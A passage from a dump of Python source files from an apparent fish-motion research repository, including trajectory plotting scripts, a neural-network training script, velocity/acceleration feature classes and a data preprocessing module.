ax.set_ylabel('Number of trajectories')\n ax.set_title(k)\n plt.tight_layout()\n\n lb = '{:.3f}'.format(round(dgrid[0], 3))\n ub = '{:.3f}'.format(round(dgrid[1], 3))\n dgrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n new_path = path + dgrid_str + '/'\n create_dirs(new_path)\n plt.savefig(\n new_path + 'theta_{}__type_{}.png'.format(dgrid_str, k))\n plt.close()\n print('Angles to wall: done')\n\n # inter individual distance plots\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n for agrid, sub_dict2 in sub_dict1.items():\n if agrid == 'all':\n continue\n\n cell_range = []\n count = []\n\n for igrid, sub_dict3 in sub_dict2.items():\n if igrid == 'all':\n continue\n\n cell_range.append('[{:.3f}, {:.3f}]'.format(\n round(igrid[0], 3), round(igrid[1], 3)))\n count.append(len(sub_dict3['all']))\n\n if (len(sub_dict3['all']) > 0):\n ccycler = cycle(sns.color_palette(new_palette))\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n symmetrized_xy = []\n for idx in sub_dict3['all']:\n seg = segments[idx[0]]\n r1 = np.sqrt((seg[:, idx[1]*2] - args.center[0]) ** 2 +\n (seg[:, idx[1]*2 + 1] - args.center[1]) ** 2)\n phi1 = np.arctan2(\n (seg[:, idx[1]*2 + 1] - args.center[1]), (seg[:, idx[1]*2] - args.center[0]))\n\n if (phi1[args.observation_len] < 0):\n phi1 = np.abs(phi1)\n phi1 = phi1 - phi1[0]\n phi1 = np.array(\n list(map(angle_to_pipi, phi1)))\n\n x = r1 * np.cos(phi1)\n y = r1 * np.sin(phi1)\n symmetrized_xy.append(np.array([x, y]).T)\n\n marker, scale = gen_arrow_head_marker(\n angle_to_pipi(seg[args.observation_len, 15 + idx[1]] - phi1[0]))\n\n c = next(ccycler)\n plt.plot(x, y, linestyle=':', color='k')\n plt.plot(x[0], y[0], marker=marker,\n linestyle='None', color='k', markersize=(scale*4)**2)\n plt.plot(x[-1], y[-1], marker='x',\n linestyle='None', color='k')\n\n if (len(sub_dict3['all']) > 0):\n outer = plt.Circle(\n (0, 0), 0.25, color='k', fill=False)\n ax.add_artist(outer)\n\n ax.set_xlim([-0.3, 0.3])\n ax.set_ylim([-0.3, 0.3])\n\n lb = '{:.3f}'.format(round(dgrid[0], 3))\n ub = '{:.3f}'.format(round(dgrid[1], 3))\n dgrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.1f}'.format(round(agrid[0], 1))\n ub = '{:.1f}'.format(round(agrid[1], 1))\n agrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.3f}'.format(round(igrid[0], 3))\n ub = '{:.3f}'.format(round(igrid[1], 3))\n igrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n new_path = path + dgrid_str + '/' + agrid_str + \\\n '/' + igrid_str + '/'\n create_dirs(new_path)\n plt.savefig(\n new_path + 'traj_{}__{}__{}_type_{}.png'.format(dgrid_str, agrid_str, igrid_str, k))\n plt.close()\n\n create_dirs(new_path)\n plot_future_trajectory_variance(\n symmetrized_xy, new_path, k, ax, args)\n\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n ccycler = cycle(sns.color_palette(new_palette))\n\n if len(count):\n sns.barplot(x=cell_range, y=count,\n ax=ax, color=next(ccycler))\n ax.set_xlabel('Interindividual distance (m)')\n ax.set_ylabel('Number of trajectories')\n ax.set_title(k)\n plt.xticks(rotation=45)\n plt.tight_layout()\n\n lb = '{:.3f}'.format(round(dgrid[0], 3))\n ub = '{:.3f}'.format(round(dgrid[1], 3))\n dgrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.1f}'.format(round(agrid[0], 1))\n ub = '{:.1f}'.format(round(agrid[1], 1))\n agrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n new_path = path + dgrid_str + '/' + agrid_str + '/'\n create_dirs(new_path)\n plt.savefig(\n new_path + 'idist_{}__{}__type_{}.png'.format(dgrid_str, agrid_str, k))\n plt.close()\n print('Interindividual distance: done')\n\n # trajectory variance plots va grid\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n for agrid, sub_dict2 in sub_dict1.items():\n if agrid == 'all':\n continue\n\n for igrid, sub_dict3 in sub_dict2.items():\n if igrid == 'all':\n continue\n\n for vagrid, sub_dict4 in sub_dict3.items():\n if vagrid == 'all':\n continue\n\n if (len(sub_dict4['all']) > 0):\n ccycler = cycle(sns.color_palette(new_palette))\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n symmetrized_xy = []\n for idx in sub_dict4['all']:\n seg = segments[idx[0]]\n r1 = np.sqrt((seg[:, idx[1]*2] - args.center[0]) ** 2 +\n (seg[:, idx[1]*2 + 1] - args.center[1]) ** 2)\n phi1 = np.arctan2(\n (seg[:, idx[1]*2 + 1] - args.center[1]), (seg[:, idx[1]*2] - args.center[0]))\n\n if (phi1[args.observation_len] < 0):\n phi1 = np.abs(phi1)\n phi1 = phi1 - phi1[0]\n phi1 = np.array(\n list(map(angle_to_pipi, phi1)))\n\n x = r1 * np.cos(phi1)\n y = r1 * np.sin(phi1)\n symmetrized_xy.append(np.array([x, y]).T)\n\n marker, scale = gen_arrow_head_marker(\n angle_to_pipi(seg[args.observation_len, 15 + idx[1]] - phi1[0]))\n\n c = next(ccycler)\n plt.plot(x, y, linestyle=':', color='k')\n plt.plot(x[0], y[0], marker=marker,\n linestyle='None', color='k', markersize=(scale*4)**2)\n plt.plot(x[-1], y[-1], marker='x',\n linestyle='None', color='k')\n\n if (len(sub_dict4['all']) > 0):\n outer = plt.Circle(\n (0, 0), 0.25, color='k', fill=False)\n ax.add_artist(outer)\n\n ax.set_xlim([-0.3, 0.3])\n ax.set_ylim([-0.3, 0.3])\n\n lb = '{:.3f}'.format(round(dgrid[0], 3))\n ub = '{:.3f}'.format(round(dgrid[1], 3))\n dgrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.1f}'.format(round(agrid[0], 1))\n ub = '{:.1f}'.format(round(agrid[1], 1))\n agrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.3f}'.format(round(igrid[0], 3))\n ub = '{:.3f}'.format(round(igrid[1], 3))\n igrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.1f}'.format(round(vagrid[0], 1))\n ub = '{:.1f}'.format(round(vagrid[1], 1))\n vagrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n new_path = path + dgrid_str + '/' + agrid_str + \\\n '/' + igrid_str + '/' + vagrid_str + '/'\n create_dirs(new_path)\n plt.savefig(\n new_path + 'vangle_{}__{}__{}__{}_type_{}.png'.format(\n dgrid_str, agrid_str, igrid_str, vagrid_str, k)\n )\n\n plt.close()\n\n create_dirs(new_path)\n plot_future_trajectory_variance(\n symmetrized_xy, new_path, k, ax, args)\n print('Viewing angle: done')\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {'pos': [], 'vel': [], 'dist': [], 'dist_to_wall': []}\n for p in pos:\n p = np.loadtxt(p) * args.radius\n v = Velocities([p], args.timestep).get()[0]\n data[e]['pos'].append(p)\n data[e]['vel'].append(v)\n data[e]['dist'].append(np.sqrt(\n (p[:, 0] - p[:, 2]) ** 2 + (p[:, 1] - p[:, 3]) ** 2))\n\n dist_mat = []\n for i in range(p.shape[1] // 2):\n distance = args.radius - \\\n np.sqrt(p[:, i * 2] ** 2 + p[:, i * 2 + 1] ** 2)\n dist_mat.append(distance)\n dist_mat = np.array(dist_mat).T\n data[e]['dist_to_wall'].append(dist_mat)\n\n plot_grids(data, path, None, args)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Relative orientation figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--prediction_len', type=int,\n help='Predictions to plot',\n required=True)\n parser.add_argument('--observation_len', type=int,\n help='Observations to plot',\n required=True)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n parser.add_argument('--radius_grid_res',\n type=int,\n help='Resolution (in m) for the radius of the focal individual in the future trajectory variance plot',\n default=0.025,\n required=False)\n parser.add_argument('--angle_grid_res',\n type=int,\n help='Resolution (in deg) for the angle to the wall of the focal individual future trajectory variance plot',\n default=5,\n required=False)\n parser.add_argument('--interdist_grid_res',\n type=float,\n help='Resolution (in m) for the interinidividual distance in the future trajectory variance plot',\n default=0.025,\n required=False)\n parser.add_argument('--viewing_angle_grid_res',\n type=float,\n help='Resolution (in degr) for the interinidividual distance in the future trajectory variance plot',\n default=45,\n required=False)\n parser.add_argument('--center',\n type=float,\n nargs='+',\n help='The centroidal coordinates for the setups used',\n default=[0.0, 0.0],\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.5068643689155579,
"alphanum_fraction": 0.5121728181838989,
"avg_line_length": 36.67586135864258,
"blob_id": "993d798cbab2d082c2e63d3b90e12dbc439ca412",
"content_id": "61a4cf45a4dcacceb6007c815eb315bb1cef0400",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5463,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 145,
"path": "/find/plots/nn/training_history.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport os\nimport glob\nimport argparse\nfrom tqdm import tqdm\n\nfrom find.plots.common import *\n\n\ndef get_directory_name_at_level(abs_path, depth=0, keep_parents=0):\n path = abs_path\n for _ in range(depth):\n path = os.path.dirname(path)\n\n parents = ''\n if keep_parents > 0:\n parents = [os.path.dirname(path)]\n for _ in range(keep_parents-1):\n parents.append(os.path.dirname(parents[-1]))\n parents = list(map(lambda p: os.path.basename(p) + '/', parents))\n parents = list(reversed(parents))\n parents = ''.join(parents)\n return parents + os.path.basename(path)\n\n\ndef prepare_plot_history(history_files, path, args):\n plot_dict = {}\n min_epoch = np.inf\n for hf in tqdm(history_files, desc='Transforming the history data'):\n with open(hf, \"r\") as file:\n header = file.readline().strip('\\n').split(args.nn_delimiter)\n h = np.loadtxt(hf, skiprows=1, delimiter=args.nn_delimiter)\n\n if 'epoch' in header:\n epoch_idx = header.index('epoch')\n epoch_count = h[:, epoch_idx]\n h = np.delete(h, epoch_idx, axis=1)\n header.remove('epoch')\n else:\n epoch_count = np.array(list(range(h.shape[0])))\n\n if len(epoch_count) < min_epoch:\n min_epoch = len(epoch_count)\n\n for col, quantity in enumerate(header):\n if quantity not in plot_dict.keys():\n plot_dict[quantity] = []\n plot_dict[quantity].append(\n [get_directory_name_at_level(\n hf, 2, args.nn_num_legend_parents), epoch_count, h[:, col]]\n )\n\n for k, v in plot_dict.items():\n for snum, (label, x, y) in enumerate(v):\n if args.nn_last_epoch == -1:\n nn_last_epoch = x.shape[0]\n elif args.nn_last_epoch == -2:\n nn_last_epoch = min_epoch\n else:\n nn_last_epoch = args.nn_last_epoch\n if args.nn_last_epoch > x.shape[0]:\n nn_last_epoch = x.shape[0]\n (label, x, y) = (\n label, x[:nn_last_epoch], y[:nn_last_epoch])\n\n if args.nn_num_sample_epochs > 0:\n sample_epochs = args.nn_num_sample_epochs\n if sample_epochs > x.shape[0]:\n sample_epochs = x.shape[0]\n idcs_keep = np.arange(\n 0, x.shape[0], sample_epochs)\n (label, x, y) = (label, x[idcs_keep], y[idcs_keep])\n\n plot_dict[k][snum] = (label, x, y)\n\n return plot_dict\n\n\ndef plot(exp_files, path, args):\n history_files = []\n for d in args.nn_compare_dirs:\n history_files.append(glob.glob(d + '/logs/history.csv'))\n history_files = [item for sublist in history_files for item in sublist]\n plot_dict = prepare_plot_history(history_files, path, args)\n\n with tqdm(list(plot_dict.keys())) as pbar:\n for it, (k, v) in enumerate(plot_dict.items()):\n palette = sns.color_palette(\n 'Spectral', n_colors=len(history_files))\n ccycler = cycle(palette)\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n\n pbar.set_description('Plotting {}'.format(k))\n pbar.update(it)\n abs_filename = path + '/' + k + '.png'\n\n plt.figure(figsize=(10, 6))\n ax = plt.gca()\n\n for label, x, y in v:\n sns.lineplot(x=x, y=y, ax=ax, label=label,\n linewidth=uni_linewidth, color=next(ccycler), linestyle=next(linecycler))\n ax.set_xlabel('Epochs')\n ax.set_ylabel(k)\n ax.legend(prop={'size': 4})\n plt.savefig(abs_filename)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Plot NN metrics from the training history')\n parser.add_argument('--nn_compare_dirs',\n type=str,\n nargs='+',\n help='List of directories to look through and analyse',\n required=False)\n parser.add_argument('--nn_compare_out_dir',\n type=str,\n help='Directory to output NN analysis results',\n default='nn_comparison',\n required=False)\n parser.add_argument('--nn_delimiter',\n type=str,\n help='Delimiter used in the log files',\n default=',',\n required=False)\n parser.add_argument('--nn_last_epoch',\n type=int,\n help='Plot up to nn_last_epoch data points. -1 stands for all, -2 stands for up to the min of iterations across the experiments',\n default=-1,\n required=False)\n parser.add_argument('--nn_num_legend_parents',\n type=int,\n help='Number of parent directories to show in the legend',\n default=1,\n required=False)\n parser.add_argument('--nn_num_sample_epochs',\n type=int,\n help='Number of samples to plot. -1 will consider all available points',\n default=-1,\n required=False)\n args = parser.parse_args()\n\n plot(None, './', args)\n"
},
{
"alpha_fraction": 0.4819065034389496,
"alphanum_fraction": 0.48852404952049255,
"avg_line_length": 41.78853225708008,
"blob_id": "316f2a41179566146534dd841c16fbabb6e5dbf2",
"content_id": "a669cc148249f01d30caee4a821de2eed2e4c1c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11938,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 279,
"path": "/find/models/trainer.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport tqdm\nimport argparse\nimport numpy as np\nfrom glob import glob\n\nfrom find.models.loader import Loader\nfrom find.models.storage import ModelStorage\nfrom find.models.model_factory import ModelFactory, available_models\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Model to reproduce fish motion')\n parser.add_argument('--files', '-f',\n type=str,\n help='Files to look for',\n default='processed_positions.dat',\n required=False)\n parser.add_argument('--path', '-p',\n type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--timestep', '-t',\n type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--epochs', '-e',\n type=int,\n help='Number of training epochs',\n default=1000)\n parser.add_argument('--batch_size', '-b',\n type=int,\n help='Batch size',\n default=256)\n parser.add_argument('--learning_rate', '-r',\n type=float,\n help='Learning rate',\n default=0.0001)\n parser.add_argument('--dump', '-d',\n type=int,\n help='Batch size',\n default=100)\n parser.add_argument('--load', '-l',\n type=str,\n help='Load model from existing file and continue the training process',\n required=False)\n parser.add_argument('--timesteps_skip',\n type=int,\n help='Timesteps skipped between input and prediction',\n default=0,\n required=False)\n parser.add_argument('--reload_state', action='store_true',\n help='Perform the data convertion step from the beginning',\n default=False)\n parser.add_argument('--verbose', action='store_true',\n help='Print messages where possible',\n default=False)\n\n # model selection arguments\n model_selection = parser.add_argument_group('Model selection')\n model_selection.add_argument('--model',\n default=available_models()[0],\n choices=available_models())\n\n # model options\n model_options = parser.add_argument_group('Model options')\n model_options.add_argument('--polar', action='store_true',\n help='Use polar inputs instead of cartesian coordinates',\n default=False)\n model_options.add_argument('--prediction_steps', type=int,\n help='Trajectory steps to predict',\n default=1)\n model_options.add_argument('--num_timesteps', type=int,\n help='Number of LSTM timesteps',\n default=5)\n model_options.add_argument('--distance_inputs', action='store_true',\n help='Use distance data as additional NN inputs',\n default=False)\n\n # model options\n model_builder = parser.add_argument_group('Model builder options')\n model_builder.add_argument('--model_layers', type=str,\n nargs=\"+\",\n default=['LSTM', 'Dense', 'Dense',\n 'Dense', 'Dense_out'],\n help='NN structure for model builder',\n required=False)\n model_builder.add_argument('--model_neurons', type=int,\n nargs=\"+\",\n default=[32, 25, 16, 10, -1],\n help='NN layer neurons',\n required=False)\n model_builder.add_argument('--model_activations', type=str,\n nargs=\"+\",\n default=['sigmoid', 'sigmoid',\n 'sigmoid', 'tanh', 'None'],\n help='NN layer activations',\n required=False)\n\n # data split\n data_split_options = parser.add_argument_group('Data split options')\n data_split_options.add_argument('--train_fraction',\n type=float,\n help='Validation set fraction',\n default=0.85)\n data_split_options.add_argument('--val_fraction',\n type=float,\n help='Validation set fraction',\n default=0.13)\n data_split_options.add_argument('--test_fraction',\n type=float,\n help='Test set fraction',\n default=0.02)\n\n # logging & stopping criteria options\n logstop_group = parser.add_argument_group('Logging & stopping criteria')\n logstop_group.add_argument('--model_checkpoint', action='store_true',\n help='Save the best model as a checkpoint',\n default=False)\n logstop_group.add_argument('--early_stopping', action='store_true',\n help='Enable early stopping if the NN is converging',\n default=False)\n logstop_group.add_argument('--min_delta',\n type=float,\n help='Minimum delta for early stopping',\n default=0.1)\n logstop_group.add_argument('--patience',\n type=int,\n help='Epoch patience for stopping criteria',\n default=10)\n\n logstop_group.add_argument('--enable_tensorboard', action='store_true',\n help='Enable tensorboard logging',\n default=False)\n logstop_group.add_argument('--custom_logs', action='store_true',\n help='Enable custom logging',\n default=False)\n\n lr_scheduler_group = parser.add_argument_group(\n 'Logging & stopping criteria')\n lr_scheduler_group.add_argument('--lr_time_based_decay', action='store_true',\n help='Enable time based decay learning rate',\n default=False)\n\n lr_scheduler_group.add_argument('--lr_exp_decay', action='store_true',\n help='Enable exponential decay learning rate',\n default=False)\n lr_scheduler_group.add_argument('--exp_decay_k',\n type=float,\n help='Exponential decay exponent rate',\n default=0.1)\n args = parser.parse_args()\n\n # data loading is handled here depending on the number of individuals\n # the loader will also handle the data splitting process according\n # to the arguments provided\n loader = Loader(path=args.path)\n model_storage = ModelStorage(args.path)\n\n if args.reload_state:\n pos, files = loader.load(args.files)\n inputs, outputs = loader.prepare(pos, args)\n td, tv, tt = loader.split_to_sets(inputs, outputs, args)\n\n # model storage instance to tidy up the directory and take care of saving/loading\n model_storage.save_sets(td, tv, tt)\n else:\n td, tv, tt = loader.load_from_sets()\n\n model_factory = ModelFactory()\n\n # model can be loaded from file to continue training from snapshot\n init_epoch = 0\n if args.load:\n import os\n\n basename = os.path.basename(args.load)\n if basename == 'latest':\n model_files = glob(os.path.dirname(args.load) + '/model_*.h5')\n\n def epoch_checkpoint(key): return int(\n key.split('_')[-1].split('.')[0])\n model_files.sort(key=epoch_checkpoint, reverse=True)\n args.load = model_files[0]\n\n model = model_storage.load_model(\n args.load, model_factory.model_backend(args.model), args)\n init_epoch = int(os.path.basename(\n args.load).split('_')[-1].split('.')[0]) + 1\n else:\n if 'LSTM' in args.model:\n model = model_factory(\n model_choice=args.model,\n input_shape=(args.num_timesteps, td[0].shape[2]),\n output_shape=td[1].shape[1],\n args=args,\n )\n else:\n model = model_factory(\n model_choice=args.model,\n input_shape=(td[0].shape[1],),\n output_shape=td[1].shape[1],\n args=args,\n )\n\n if model_factory.model_backend(args.model) == 'keras':\n from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, TensorBoard, CSVLogger, LearningRateScheduler\n\n model.summary()\n\n callbacks = []\n\n if args.custom_logs:\n callbacks.append(\n CSVLogger(\n model_storage.get_logs_path() + '/history.csv', separator=',', append=True)\n )\n\n if args.model_checkpoint:\n callbacks.append(\n ModelCheckpoint(\n filepath=model_storage.get_checkpoint_path() + '/best_model.h5',\n monitor='loss',\n save_weights_only=False,\n save_best_only=True))\n\n if args.early_stopping:\n callbacks.append(EarlyStopping(\n monitor=\"loss\",\n min_delta=args.min_delta,\n patience=args.patience,\n verbose=1))\n\n if args.enable_tensorboard:\n callbacks.append(TensorBoard(\n log_dir=model_storage.get_logs_path(),\n histogram_freq=1000,\n write_graph=False,\n write_images=False,\n update_freq=\"epoch\",\n profile_batch=5))\n\n if args.lr_time_based_decay:\n starting_lr = args.learning_rate\n decay = starting_lr / args.epochs\n\n def lr_time_based_decay(epoch, lr):\n return lr * 1 / (1 + decay * epoch)\n callbacks.append(LearningRateScheduler(\n lr_time_based_decay, verbose=1))\n elif args.lr_exp_decay:\n import math\n starting_lr = args.learning_rate\n k = args.exp_decay_k\n\n def lr_exp_decay(epoch, lr):\n return starting_lr * math.exp(-k * epoch)\n callbacks.append(LearningRateScheduler(lr_exp_decay, verbose=1))\n\n # for epoch in range(init_epoch, args.epochs):\n # _ = model.fit(td[0], td[1],\n # validation_data=(tv[0], tv[1]),\n # batch_size=args.batch_size,\n # epochs=epoch + 1,\n # initial_epoch=epoch,\n # callbacks=callbacks,\n # verbose=args.verbose)\n\n _ = model.fit(td[0], td[1],\n validation_data=(tv[0], tv[1]),\n batch_size=args.batch_size,\n epochs=args.epochs,\n initial_epoch=init_epoch,\n callbacks=callbacks,\n verbose=args.verbose)\n\n model_storage.save_model(\n model, model_factory.model_backend(args.model), args, epoch)\n"
},
{
"alpha_fraction": 0.5537152886390686,
"alphanum_fraction": 0.5684870481491089,
"avg_line_length": 35.62295150756836,
"blob_id": "32c331e01c8ad25a81190b85c8f78628fe24d61b",
"content_id": "4f34ccc34c1854233ef87a39e7a725437050ed43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2234,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 61,
"path": "/find/utils/features.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass Derivative:\n def __init__(self, matrix, timestep):\n \"\"\"\n :param positions: list(np.array) of (x_1, y_1, ..., x_n, y_n) position matrices of fish individuals\n :param timestep: float time interval between each measurement (sampling rate)\n \"\"\"\n self._deriv = []\n for m in matrix:\n rolled_m = np.roll(m, shift=1, axis=0)\n deriv = (m - rolled_m) / timestep\n sigma = np.std(deriv[1:, :], axis=0)\n mu = np.mean(deriv[1:, :], axis=0)\n x_rand = np.random.normal(mu[0], sigma[0], m.shape[1] // 2)[0]\n y_rand = np.random.normal(mu[1], sigma[1], m.shape[1] // 2)[0]\n for i in range(m.shape[1] // 2):\n deriv[0, i * 2] = deriv[1, i * 2] + x_rand\n deriv[0, i * 2 + 1] = deriv[1, i * 2] + y_rand\n self._deriv.append(deriv)\n\n def get(self):\n \"\"\"\n :return: list(np.array) of resultant derivatives for each of the matrices provided to the class\n \"\"\"\n return self._deriv\n\n\nclass Velocities(Derivative):\n \"\"\"Simplistic instantaneous velocity computation.\"\"\"\n\n def __init__(self, positions, timestep):\n \"\"\"\n :param positions: list(np.array) of (x_1, y_1, ..., x_n, y_n) position matrices of fish individuals\n :param timestep: float time interval between each measurement (sampling rate)\n \"\"\"\n super().__init__(positions, timestep)\n\n def get(self):\n \"\"\"\n :return: list(np.array) of resultant velocities for each of the matrices provided to the class\n \"\"\"\n return super().get()\n\n\nclass Accelerations(Derivative):\n \"\"\"Simplistic instantaneous accelaration computation.\"\"\"\n\n def __init__(self, velocities, timestep):\n \"\"\"\n :param velocities: list(np.array) of (x_1, y_1, ..., x_n, y_n) position matrices of fish individuals\n :param timestep: float time interval between each measurement (sampling rate)\n \"\"\"\n super().__init__(velocities, timestep)\n\n def get(self):\n \"\"\"\n :return: list(np.array) of resultant acceleration for each of the matrices provided to the class\n \"\"\"\n return super().get()\n"
},
{
"alpha_fraction": 0.48539310693740845,
"alphanum_fraction": 0.49605438113212585,
"avg_line_length": 40.72983932495117,
"blob_id": "111ebc925281bae12e302805eac09b218315e9ee",
"content_id": "4185d8ba93829cddc8a2b86b595c2ce33d232e31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31047,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 744,
"path": "/find/utils/preprocess.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport tqdm\nimport argparse\nimport datetime\nimport glob\nimport numpy as np\nimport os\nimport socket # for get hostname\nfrom pathlib import Path\nfrom word2number import w2n\nfrom pprint import pprint\nfrom copy import copy, deepcopy\n\nfrom find.utils.features import Velocities\nfrom find.utils.utils import ExperimentInfo, Center, Normalize\n\n\nclass Archive:\n \"\"\"Serialization class for the fish experiments.\"\"\"\n\n def __init__(self, args={}):\n \"\"\"\n :param args: dict, optional of generic arguments for the class\n \"\"\"\n if args.out_dir:\n self._experiment_path = args.out_dir\n else:\n self._hostname = socket.gethostname()\n self._timestamp = datetime.date.today().strftime('%Y_%m_%d') + '-' + \\\n datetime.datetime.now().strftime('%H_%M_%S')\n self._experiment_path = self._hostname + '_' + self._timestamp\n\n if not os.path.exists(self._experiment_path):\n os.makedirs(self._experiment_path)\n\n def path(self):\n \"\"\"\n :return: Path to the experiment folder that was created in the constructor\n \"\"\"\n return Path(self._experiment_path)\n\n def save(self, data, filename):\n \"\"\"\n :param data: np.array of arbitrary numerical data\n :param filename: str filename for the output data file\n \"\"\"\n if isinstance(data, (np.ndarray, np.generic)):\n np.savetxt(self.path().joinpath(filename), data)\n else:\n assert False, 'Can not store data structures of this type'\n\n\ndef load(exp_path, fname, has_probs=True, has_heading=False):\n \"\"\"\n :param exp_path: str path to the experiment folder where the data we want to load are stored\n :param fname: str the name of the files we want to load\n :return: tuple(list(np.array), list) of the matrices and corresponding file names\n \"\"\"\n files = glob.glob(exp_path + '/**/' + fname)\n data = []\n for f in files:\n matrix = np.loadtxt(f, skiprows=1)\n if has_probs:\n matrix = np.delete(matrix, np.s_[2::3], 1)\n if has_heading:\n matrix = matrix[:, 1:]\n matrix = np.delete(matrix, np.s_[2::3], 1)\n\n data.append(matrix)\n return data, files\n\n\ndef preprocess(data, files, filter_func, args={'scale': 1.0}):\n \"\"\"\n :param data: list(np.array) of position data for different fish individuals or experiments\n :param files: list(str) of position files\n :param filter_func: func that will apply a smoothing on the data\n :param args: dict, optional for extra arguments that need to be passed to this function\n :return: list(np.array), ExperimentInfo\n \"\"\"\n # every matrix should have the same number of rows\n if 'initial_keep' in args.keys():\n for i in range(len(data)):\n skip = data[i].shape[0] - args['initial_keep']\n data[i] = data[i][skip:, :]\n\n # invert the Y axis if the user want to (opencv counts 0, 0 from the top left of an image frame)\n for i in range(len(data)):\n if args['invertY']:\n resY = args['resY']\n for n in range(data[i].shape[1] // 2):\n data[i][:, n * 2 + 1] = resY - data[i][:, n * 2 + 1]\n\n for i in tqdm.tqdm(range(len(data)), desc='Interpolating'):\n data[i] = interpolate(data[i], args)\n\n info = ExperimentInfo(data)\n\n if 'diameter_allowed_error' in args.keys():\n diameters = []\n for i in range(len(data)):\n xminh = info.minXY(i)[0]\n xmaxh = info.maxXY(i)[0]\n yminh = info.minXY(i)[1]\n ymaxh = info.maxXY(i)[1]\n maxdh = max([xmaxh-xminh, ymaxh-yminh])\n diameters.append(maxdh)\n diameter_thres = np.median(diameters) * args['diameter_allowed_error']\n diameter_diff = [np.abs(x - np.median(x)) for x in diameters]\n\n # pixel to meter convertion\n for i in range(len(data)):\n # this step should roughly convert pixels to meters\n print('experiment_' + str(i))\n if args['scale'] < 0:\n assert ('radius' in args.keys(\n )), 'Automatic scaling factor computation requires knowledge of the radius'\n\n xmin = info.globalMinXY()[0]\n xmax = info.globalMaxXY()[0]\n ymin = info.globalMinXY()[1]\n ymax = info.globalMaxXY()[1]\n maxd = max([xmax-xmin, ymax-ymin])\n\n if 'use_global_min_max' in args.keys() and not args['use_global_min_max']:\n xminh = info.minXY(i)[0]\n xmaxh = info.maxXY(i)[0]\n yminh = info.minXY(i)[1]\n ymaxh = info.maxXY(i)[1]\n maxdh = max([xmaxh-xminh, ymaxh-yminh])\n\n if 'diameter_allowed_error' in args.keys() and diameter_diff[i] > diameter_thres:\n maxd = maxdh\n\n a = 2 * args['radius'] / maxd\n data[i] = data[i] * a\n else:\n data[i] = data[i] * args['scale']\n\n info = ExperimentInfo(data)\n info.printInfo()\n\n # here we attempt to address the tracking misclassification of the trajectories causing sudden jumps\n for i in tqdm.tqdm(range(len(data)), desc='Disentangling trajectories'):\n data[i] = correct_trajectories(data[i], args)\n\n # this is the main filtering function selected by the user. Although even the jumping can be included in this section\n # we opted to separate the two so as to allow more freedom for people that want to implement custom functions\n idcs_remove = []\n for i in tqdm.tqdm(range(len(data)), desc='Filtering'):\n data[i] = filter_func(data[i], args)\n if data[i].shape[0] < (args['min_seq_len'] / (args['timestep'] / args['centroids'])):\n idcs_remove.append(i)\n\n idcs_removed = 0\n for i, idx in tqdm.tqdm(enumerate(idcs_remove), desc='Removing small files after filtering'):\n del data[idx - idcs_removed]\n 